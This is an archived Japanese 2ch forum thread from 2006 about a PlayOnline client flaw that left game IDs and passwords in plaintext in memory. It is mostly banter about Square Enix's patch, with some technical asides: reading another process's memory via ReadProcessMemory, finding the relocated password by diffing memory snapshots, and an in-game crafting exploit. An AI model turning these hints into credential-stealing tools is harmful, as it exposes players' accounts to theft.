そしてそれがパッチ一発で出来るとは思いにくいんだが、SEはどうやってパッチあてるつもりだろう・・・？
共通鍵で暗号化しても>>132が言うみたいにそっくりそのままコピペしたらいいみたいだし。

といってもPC内にハッカーの手下が住んでたらなにしても手遅れかな・・・。

これは課金情報とかに関わるからなんだろうが・・・

早すぎﾜﾛﾀ

やっぱ、ネ実の力はすごいなw

　

セキュリティオフィサー的立場なオレから言わせてもらうと、

> ※不正な外部プログラムや、ウィルス等への感染が無い場合には、
> 　プレイオンラインIDおよびパスワードが盗用されることはあり
> 　ません。

不正なプログラムやウィルスは、動いてるのが分からないように細工して仕込むものです。
そういうのから進入されてても、なおIDやパスワードを守れるようにするのがセキュリティ対策なんです。
さすがにキーロガー仕込まれたら終わりだが、安直にメモリに平文で内容を保持するなんて、まずありえない。
だから「不正な外部プログラムを〜」なんてアナウンスは、セキュリティ対策にすらならないんです。

セキュリティの考え方を改めてくださいね、■eさん。

セキュリティ対策会社にでも騙されたのか、暗号が万能だと思ってる人が多いな・・・

SSL位かな安全なのは・・・

じゃあそのSSLとやらを導入したまへ

だからって平文置きっぱなしはアホ過ぎると思わんか？

FFやり初めて1年10ヶ月
ネ実を見て早1年半

気付けば技術チームに＾＾v

お前らがつまらない煽り入れるから■はここ見ない振りしてんだろうなｗ
ぷれみあｗより遙かに建設的な意見も多いのにな。もったいないｗ

ここでｳﾝﾁｸ語られても困るんだけど？ｗｗｗｗ

無償技術チーム、ご苦労

二年ほど前に同内容がネ実で騒がれてた時は完全スルーしてたのにな。
なにが調査だ、バカか？

うーん、なんで、メモリオフセット指定するだけで読めるんだろ？
グローバル変数って、常に同じオフセットになるとかそんな感じ？

まぁセキュリティレベルとしては低い方だろうね

スペシャルタスクチームはネ実を監視するチームってことか！

ユーザーに馬鹿が多い事を■eが認識したから、
馬鹿のご機嫌取りでアホな対応もやって行こうって方針なんだろうな
顧客満足ｗって奴か

ニートな俺もこれで給料貰えますか？ｗ

>>205
>>210

>>77
77 名前：既にその名前は使われています[sage] 投稿日：2006/10/04(水) 18:48:37.80 ID:h2knBMfW
脆弱性を自らネ実で公開
→即時対応
→■＜タスクチームの威力です

・・・マッチポンプ？

■e公式に謝罪してくんないかな、発売当初から放置してたくせにいまさら遅いんじゃないの？
ちなみにスレチガイだがＶアプリのドラクエとかの致命的なバグもそろそろ認めたほうが良いんじゃないかな■eさん

てか、おまいらいいか！ＦＦ１１のＰＣ版ばっかじゃねえぞ、また■ｅ逃げるから見てな

スレたてようとしたらたてれんかった。堂々とウソかくチーム晒し上げ



技術チームの調査は掲示板を見ること

名前： 既にその名前は使われています
E-mail：
内容：
PlayOnlineのパスワードぶっこ抜きデモが公開
http://live19.2ch.net/test/read.cgi/ogame/1159949412/l50


http://www.playonline.com/home/polnews/news8674.shtml

別スレでも書いたが、POLのIDがメモリにベタで入っているという事実は、
半年か１年前に情報として公開されていた。
ツールは出てなかったけどな。

で、■の対応はツールが出てから。なんだそりゃ？

「この車、場合によっては大爆発しますねー」
「そうか、いつ爆発するんだ？」
「状況によりますねー　でも1年後は全国の８割が爆発しますよー」
「そうか、じゃあ爆発したら教えてくれ」

1年後
「全国の８割以上が爆発しました！」
「なんだって！そんな大問題が！！ああああ緊急会議だ！！いったいどういうことなんだ！！」


みたいなノリ

>>223
同じプログラムだったら動的に確保しても
同じアドレスに確保されたりすることはまれによくある

今回のパッチの内容を予想
　�@"PlayOnline Viewer "が"PlayOnline-Viewer"に変化。これで緊急対応完了。
　�AVer.1.17.02hがVer.1.17.03bに変化。これで対策完了。
　�BIDとパスワード、それぞれ前後逆転して格納。これで対策完璧！
　�CIDとパスワードをファイル管理にして、毎回ファイルから読み出し。
　　この影響で、接続できなくなる不具合が発見され、連休中プレイできない人が大勢出現
　�D格納アドレス変えました(^^

娯楽産業は管理が甘くなるのが弱点だな

間違っても被害が少ない

>>229
技術チーム＝チームネ実
http://live19.2ch.net/test/read.cgi/ogame/1160009178/
1 名前：既にその名前は使われています[] 投稿日：2006/10/05(木) 09:46:18.08 ID:SN83lfHD

パスぬいて昼間なら俺のキャラで遊ばせてやるよ｡夜は俺やるからやるな
ちなみに今月課金してないからついでにやっといてくれ｡
ウェブマネーだから買ってくんの忘れんなよ

スクウェアの言う技術＝インターネットのページを読む技術

糞樽：お前等必死だなｗｗｗ

まあ、アレだ。やられたやつプギャー！！
なんでも他人のせいにするんじゃねぇよｗｗｗ

おまえら必死だなｗ

これまでの人生の何割をこのキャラに使ってると思ってるんだｗｗｗｗｗｗｗｗｗｗ

>231
まれによくある反語アゲ

>>241
ブロントさんみたいなネ実語アルヨ。

>>241
ブロ語勉強しておいで

ユーザーはデバッガー、この言葉に嘘は無いな。

今このスレに開発がはりついてるのは確定的なので、ここで強化要望出そうぜｗ

もうここネトゲ実況板じゃおかしいな
ネトゲ技術開発板(スクエニチーム)に名前変えようぜ

ちょｗｗおまいらどうするんだｗｗｗ


某社長の　「これからはユーザーにデバッグさせればいい」

が実現しちまったじゃまいか！！！！！







・・・・・はっ。　　　も・ももも・もしかしてスペシャルタスクチームというのは、ユーz.

スペシャルタスクチームって漏れらの事でしょ

>>229
吹いた
よもやいまさらネ実に焚きつけられて動くなんてことはないと思ってたが･･･
判明時点で対策しないなら今回のも見なかったことでいいんじゃないのか

>>249
チゴーとかNAは一月以上やってたのにネ実にスレたって6時間で緊急メンテ

チゴーバグ発覚のときも明らかに見てたからねぇ
正直メールなんざ送るより非公式であるネ実にスレ立てたほうがよっぽど意見は反映される
こんなの異常だ　異常過ぎる
ずっと前から分かりきってたことではあるけど改めて再確認出来た

おっと、かぶってたか
これは失敬

もうこうなったらFFのシステム公開してユーザーにデバック・修正・追加・更新させたらいいんじゃね？

>>1は良識のある開発担当の内部告発

>>230
喩えがおかしいな
POLIDがメモリにベタで入ってるって「情報」がでたのが１年前であっても
その時点では何の証拠もなかったからノーカンだろ？
今回ツールが公開されて初めて事実として確認された
つまり昨日のツール公開時点まで、POLIDがメモリにベタで入ってるって
いう「事実」は無かったんだよ
わかるかな？
事実が出た以上対策を講じるのは当然なんだけど、今回非常に対応が
早くてて、運営のやる気が感じられた
深夜まで対策に追われて大変だったと思う
セキュリティへの意識も高く我々ユーザーは安心してゲームできるんだから
労いの言葉くらいかけてあげようよ

証拠も無いって…
メモリサーチ掛けたら一発で判るだろうがｗ

橋をかけるのを忘れていて、みんな泳いでわたっていた。
ある人物が、橋がないのはなぜ？って大声で言った。
翌日、そこには橋ができあがった。
翌日、みんなは泳いでわたっていた。

バグつながりで

合成でたとえば鍛冶と彫金を同時に+3とかスキルを上げる方法あるけど
こういうのは広めないで自分だけウマーした方がいいの？
これを使うと絶対+11や+31を確保できない合成（ホーバージョン等）で
有利になるけど。

そんなあからさまな釣りでも反応したくなってしまうのはまだまだ未熟ってことかな・・・

>>258
鍛冶エプロンとかきて、彫金サポすればいいんじゃねーの？

装備とは別枠で鍛冶+3彫金+3とかできる。
つまり
例えだけど鍛冶109　彫金63の状態で合成できるってこと。

たぶん、+3できるのは2種までだと思う

ｺﾞｸﾘ･･･

証拠もないって・・・
開発側は作った時点で把握してるわけだが

合成時にオフセット0x421144FFのメモリいじるといい事あるお！

109ってなんだ、106ね
ホーバーならメイン100　裁縫70にすればいいから
鍛冶94+3+3　裁縫66+メガネ+3でHQ率が約25％にできる。
少し考えればやり方わかると思うよ。

ID:F4PP6gs9
どうみても社員です。
>>205
>>255
205 名前：既にその名前は使われています[sage] 投稿日：2006/10/05(木) 09:01:25.76 ID:F4PP6gs9
今回対応早いな〜最近本当に運営チーム頑張ってるね
ちょっと見直しちゃった

自演擁護するにももう少し賢い文面を考えてくれ

>>255
釣りかもしれんが、俺の喩えでも「車が爆発したという事実」は無いんだが・・・
つまり、１年後に実際に爆発するまで、車が爆発するって
いう「事実」は無かったんだよ
わかるかな？

>>255
>深夜まで対策に追われて大変だったと思う

馬鹿か？甘い設計に甘いセキュリティ概念に甘い管理体制が祟ってこうなったんだろ。
そういった甘さが総じて毎回大慌てで、でもその場対策しか行わない、
目の前で起きたことしか対策しない（影響範囲？なにそれ？？って状態だ）から、
全ては本人達の責任じゃないか。深夜？大変？馬鹿か、おまえは。

学生か？

こういうところから開発はJPへの見方を悪くし、逆に何故かNAの見方はよくなるのか？
>>255
取りあえず早急に対策を講じたのは、範疇としては企業として当然のことだけど、
その当然のことが出来ない企業が増えている昨今、それらと見比べればよくやったといえなくもないかもしれない･･･
だがそれ以上に過失が大きすぎる
あとはっきり言うが、前半部分はほぼ屁理屈に近いものがある
もし本当に>>255が社員だとしたら、解約せざるを得んな･･･
流石にそれはないだろうけど

現場の人間にはご苦労さん
多分初期から残ってたミスだろうから、ソース書いた香具師は
ひょっとしたらもう現場にはいないかもしれんし

ただ、ミスの程度がヘボいのに加えて、発覚したのがこのスレか壺だったり、
今まで指摘した者はいなかったのかとか、そもそも知ってたんじゃないの？とか
色々な要因から、企業としては「なにやってんだよ」というレベル

パスに11111111...でXORしただけとかありそうだ。

ふつうに４桁の番号で、0721

>>269
喩えがおかしいって意味がうまく伝わらなかったようで残念
車の不具合に喩るなら今回のことは
車（ＦＦ）には特に問題がなかったのに、車の持ち主（プレイヤー）が違法改造パーツを
勝手に無断で装着（ツール使用）して走り回って事故（ＩＤＰＡＳＳ漏洩）起こす危険が
あるっていうのと同じレベルの話で、最初から爆発するような車ではなかったって事
つまり悪いのはツール作者とそれを使ったユーザーであってメーカーには何の落ち度も
無いって事だよ？

win版がでた当初から言われていたIDとパスワードを暗号化せずに
メモリに保存したままというありえない脆弱性を散々放置したあげく
シナチクサイトに悪用されて実際に盗用事件もおきた。(2005/10、花の雫FF11情報局事件)
それでもなお修正せずに、デモプログラムが公開されたからネ実巡回チームが慌てただけだろ


77 名前：既にその名前は使われています[sage] 投稿日：2006/10/04(水) 18:48:37.80 ID:h2knBMfW
脆弱性を自らネ実で公開
→即時対応
→■＜タスクチームの威力です

危険性を認識したままなんら対策を講じなかったというのなら、十分「落ち度」と言えるような。
POLはオプションでウィンドウ化できるから、起動したままレシピ検索などのツールを動かすことは
十分想定の範囲内だと思うんだが。
これがPOLから強制フルスクリーン化ならまだ猶予の余地はあったんだが。

なんつーかアレだ。別の事象に例えるとかえってややこしくなるってことだ。
「決められた日以外にゴミを出すと、熊に襲われる可能性があります」とかｗ

変更前
char pasuwa_do[9] = {0};
strncpy(passwa_do, コントロールから文字列取る関数(), 8);

変更後
char buf[100] = {0};
char* pasuwa_do = buf + 50;
strncpy(passwa_do, コントロールから文字列取る関数(), 8);

こんな感じじゃね？ｗｗ

どこぞのガス器具と一緒じゃねーの？不正改造すると不完全燃焼しますってやつ
改造しなきゃ何も問題は発生しないわけだがユーザーの知らないところで
勝手に改造されることもあって結局対策を取らざるを得なくなった　←ｲﾏｺｺ

この場合、改造され易い構造にした設計者に全ての問題があるかというと
そうは言えないわけだが結果としては責任を取るべき立場にいるわけだよな

>279
正規の改良部品が間に合わなくて、不正改造をメーカーから指示されたとかで揉めてるやつか。

たぶん違う

ありゃ、ガス器具って言うからパ□マのことかと思ったんだが、違ったか。
とまぁ、こんなふうに例え話にすると齟齬が起きやすいということだ。

価格.comとかベクターとかそんな公共の場ともいえるところにチョコンと置かれて
次から次へと知らず知らずのうちに感染していく恐れがあるのに
ユーザーが悪いってどういうこと？

だれかが死ぬまで放置

■の脆弱性はデモプログラム作って公開しないと
ユーザーが安心して遊べなさそうでつね

ようするに、カギの無い車を作っておいて
盗まれた時は盗んだ奴が悪いって言うことだろ

よーするに、個人情報保護シールを貼ったつもりは、付箋を貼っていたってことだろwww

ようするに知識のない馬鹿が不正ツール引っ掛かって
パス抜かれる可能性を示唆してるんじゃない

で。
俺様が安心して不正ツール使えるようにさっさと
□ｅは対策しやがれと

騒ぎ立ててる連中が言ってるレベルはその低度なわけよ

久しぶりに祭りかと思ったらもう終わってるのか・・・

>>288

>>283

緊急バージョンアップでパスワードが無効になってアクセスできなくなる罠

■ならやってくれる

アンケートに答えると抽選でログイン出来るようになります

>>285
他にも中華が使っている即・寝釣りや紫→赤ネーム(あるのか？)ツールとかを
そこらじゅうの掲示板に張りまくればすぐに対応してくれるかも？

>>290

バカ？

■＜メモリとか見てハッキングしてるやつUZEEEEE

パスワードが平文のまま同じアドレスにしれっと座っていた。
SEは数年前からそれを知りうる立場にあった。（開発に聞けばわかることだからね。）
だのに何も対策をとらなかった。

このたび社外の大勢の人間がそれを知ることとなった。
その後はじめて対策をとった。

一番問題はこの最後のところだと思う。今あわてて対策をとるくらいならなぜ
数年前に対策をとっておかなかったのか？
パスワードをどこに保存するかなんてのはセキュリティ対策の基本中の基本。
どうやって送信するかの次くらいに基本だ。それも知らない奴がプログラム組んでるとは
さすがに思えないんだが。

無知無能は問題だが、怠慢の方が問題だと俺は思う。

俺は個人的には平文で同じアドレスに保管するなとはいわん。それで危険性が
大幅に増加することはないというならそれでもいいとは思う。だが、ばれたら
大急ぎで「対処」するってことはそうじゃなかろう。

先週辺りから急に変なメールがプレイオンラインビューアーを通して来てた（出会い系：非通知）。
X360で受信したらチェックの段階でフリーズしてたんだが、
何か関連ある？

ツール使わない俺には関係ないぜo(｀д´o)

FFやってない俺には関係ないぜ

関係ないぜ

ツール使う使わないは関係ない。
p2pソフト、ブラウザ、OS等のセキュリティホールを使ってウィルス（パス抜きプログラム)が
インストールされて、簡単にパスワードが抜かれる可能性があるってことだ。

まじでかっｗ

驚いてみたが正直何言ってるのかわかんねーぜっo(｀д´o)

確実性を考えるとFFに関するプログラムやサイトに仕込むのが一番だろうけど、
まったく無関係な、例えばデスクトップアクセサリに仕込まれる可能性だって考えられる。

PlayOnlineの更新キターーー！！！！

・・・・・・・・・アップデート完了、っと。さて、再ログイン・・・あれ？
なにこれIDとパスワード消えてるじゃん。えっ、ま・まさか・・・


　クライアントには一切保存せず、毎回入力を促す仕様になった


ということか？？なになにこれ？？これが■の対応力！？馬鹿じゃん！！！！！！！！１１１







という夢を見た。

>>305
キーロガー大活躍の予感だな

ま、普通に考えて>278 だろ
いま開発は必死にセキュリティの本読んでると思うよwww

■eさん給料下さい

>>278はいくらなんでもﾋﾄﾞｽｗｗｗｗｗｗ
なんにも解決になってねえ・・・ｗ

>>278の情報を拾ってくることが、スペシャルタスクチームの最初の仕事だったりしてな。

■e ttp://www.playonline.com/home/polnews/news8674.shtml
2006年10月6日(金)にプレイオンラインビューアーの緊急更新を実施いたします。
これにより、上記の不具合による危険性は回避されます。
↓
ウインドウ名変えるだけじゃね?
アドレスずらすだけじゃね?
ビット反転するだけじゃね?
↓
■e (;^ω^)…
なお、この更新作業は暫定的な対処であり、
本格的な対策は近日中に実施いたします。

>>309
過去の実績

■ < 窓化潰しました！
● < ウィンドウタイトルがFFXIから、なんか違う文字列になってるｗｗ
● < ウィンドウタイトルをユーザーが指定できるようにしますた

■ < 今度こそ窓化、完璧に潰しました！！！
● < ウィンドウタイトルが一定時間ごとにころころ変わるようになってるwwwww
● < ウィンドウタイトル書き換えをフックしますた

■ < もう、対応策見つからないぽ・・・

POL更新されたらパスワード0000000000000000とかにして
メモリイメージ採って、1111111111111111とかにして
比較すればすぐ見つかりそうだな、暫定とかだと。

個人的にはグローバル変数としてもたないで
ヒープ領域に置くだけな気がする。

>>297
POLに変なメール来たことはないわ。
同調するものも無しってことはお前自身が何かやらかしてんじゃね？

>>305
全米がゾッとした

http://news20.2ch.net/test/read.cgi/news/1160096043/

ＰＯＬのパスワードぶっこ抜きどころじゃないわけだが。

まあ抜けてるとはいえ被害者ではあるからご愁傷様だが、POLのパスワード
ぶっこ抜きはやると金が儲かるかもしれんわけで、金が絡むと本気になる奴は
ほんっとに本気になるから、FFのパスワード抜ける方が世間に与える影響は
でかい気はする。

http://www.watch.impress.co.jp/game/docs/20061005/pol.htm

静かだなオイ
ケツ毛バーガーの威力凄過ぎｗ

俺たちゃタスクチーム！

>>319
>スクウェア・エニックス、「プレイオンライン」に
>IDとパスワードを盗用できる不具合を確認

インプレスはよく理解しているね。
うん、■は「確認」しただけだ。



発見したのではない。

自社で見つけたら(公になっていないのなら)
何かのついでにこっそり直すしな。

そして不具合も追加される。

これ、パスがヒープにおいてあったら(=malloc)見えたのかな?
Win32 API眺めてたらGetProcessHeapっていう次プロセスのヒープにアクセス
するためのAPIはあったが、他プロセスのヒープを覗くAPIは見あたらなかった。
デバッガを作るのには必要だろうから、あるとは思うのだが。

そりゃ見えるさ。
ポインタ拾う分ステップ増えるけど。

ああ、ReadProcessMemoryを使う時点でそのプロセスのアドレス空間
読みまくりだから、直接他プロセスのヒープハンドルを扱わずともいい
わけか。

今システムメッセ出た。
18時30分頃POLバージョンアップ。

ﾊｲﾊｲ解析解析

あんまり伸びねぇな
どっちかっていうと儲だけどシャドウベイン級の祭りが起こるのをいつも心待ちにしてるのにｗ

プレイオンラインビューアー更新のお知らせ(10/6)
http://www.playonline.com/ff11/polnews/news8735.shtml

日　時：2006年10月6日(金) 18:30頃

対　象：プレイオンラインビューアーをご利用のお客様

【主な変更内容】

■不正なプログラムによる情報の漏洩への暫定的な対策を施しまし
　た。
　※本格的な対策は近日中の実施を予定しております。

1.17.02h→1.17.02j

>>325
プロセス関連は当然存在する
なければ、そもそもメモリエディタなんてつくれんだろ？

スクウェア・エニックス、「プレイオンライン」で脆弱性を確認。アップデートで暫定対応を完了。被害報告は0件
http://www.watch.impress.co.jp/game/docs/20061006/pol.htm

もうパス見れなくなったん？

>335
技術チーム（ネ実等）が懸命の検証作業中。

　　　　　　　　　　 　 　　 　l..:.::::::::::::::::::::::::::::ｲ　　　　　　= 　　　　=
　　　 　 　 　 　 　 　 　 　 |.:::::::::::::::::::::::::::::: |　　　　　ﾆ=　■ そ　-=
　　　　　　　　　 　 　 　 　 |:r¬‐--─勹:::::|　　　　　ﾆ=　 e　れ　=ﾆ
　　　　　　　　　　　　 　 　 |:} _＿　､.＿ ｀}f'〉ｎ＿　　 =-　な. で　-=
　　、､ l | /, ,　　　 　　 　 ,ﾍ}´`'｀｀　`´`　|ﾉ:::|.|　　ヽ　ﾆ　.ら. も　ﾆ
　.ヽ　　　　　´´, 　　　　　,ゝ|、 　 ､, 　　 l|ヽ:ヽヽ　　}　´r　：　　 ヽ｀
.ヽ　 や き ■　ﾆ.　　　 ／|｛/ :ヽ　-=-　./| |.|:::::| |　　|　　´/小ヽ｀
=　　ら .っ　e　 =ﾆ　／:.:.::ヽ､　　＼二／ :| |.|:::::| |　 /
ﾆ く か と. な　　-=　ヽ､:.:::::::ヽ､.＿､　　＿,ﾉ/.:::::| | /|
= れ し 何 ら　　-= 　 ヽ､:::::::::＼､＿＿／::.z先.:| |' :|
ﾆ るて　か　　　=ﾆ　　　| |:::::::::::::::::::::::::::::::::::.|'夂.:Y′ﾄ､
/,　：　 　　　　 ヽ､ 　　 | |::::::::::::::::::::::::::::::::::::_土_::|　 'ﾞ, .＼
　/　　　　　ヽ、

スクエにってツール使うやつにバツと思って残してたんじゃね

>>338
ttp://endless.sub.jp/another/entryimg/img_20060205T092216203.jpg

ちょｗｗｗｗｗｗｗｗ
前後入れ替えただけｗｗｗｗｗｗｗｗｗｗ

>>340
kwsk

うは、■eが先にみつけて対策したのかと思ったｗ

最強装備がエラント胴で、全所持金8万しかないから、怖くない。

ありえねぇ。平文かよ。
暗号化も何にもしてないって、ありえねぇ。
うちの会社の糞サイトだってログイン部分は普通にSSL通信なのに・・・・・・・・・・・

これ、抜かれて訴えられたら、１０００％スクエニが負けるぞ。
よく放置してるなｗ

>>344
ユーザーは訴える見込み。のニュースが流れた時点で対策を施すことを発表するｗ

応急処置ですからね。
暗号化などの改良はもう少し後でしょう。

応急処置に対応した抜き出しプログラムが公開されたら
暗号化が早まるかもしれません。

■e＜暗号化しました。
りゅうていみやおうほりさんとりさんぺぺぺぺぺ＋平文

>>343
そこまでレベル上げた時間が無駄になるんだ

a

pokotan

in

shita

YO

POLに接続できないんだが（認証中からすすまない）
ここの被害者ってことになるん？

いいえ。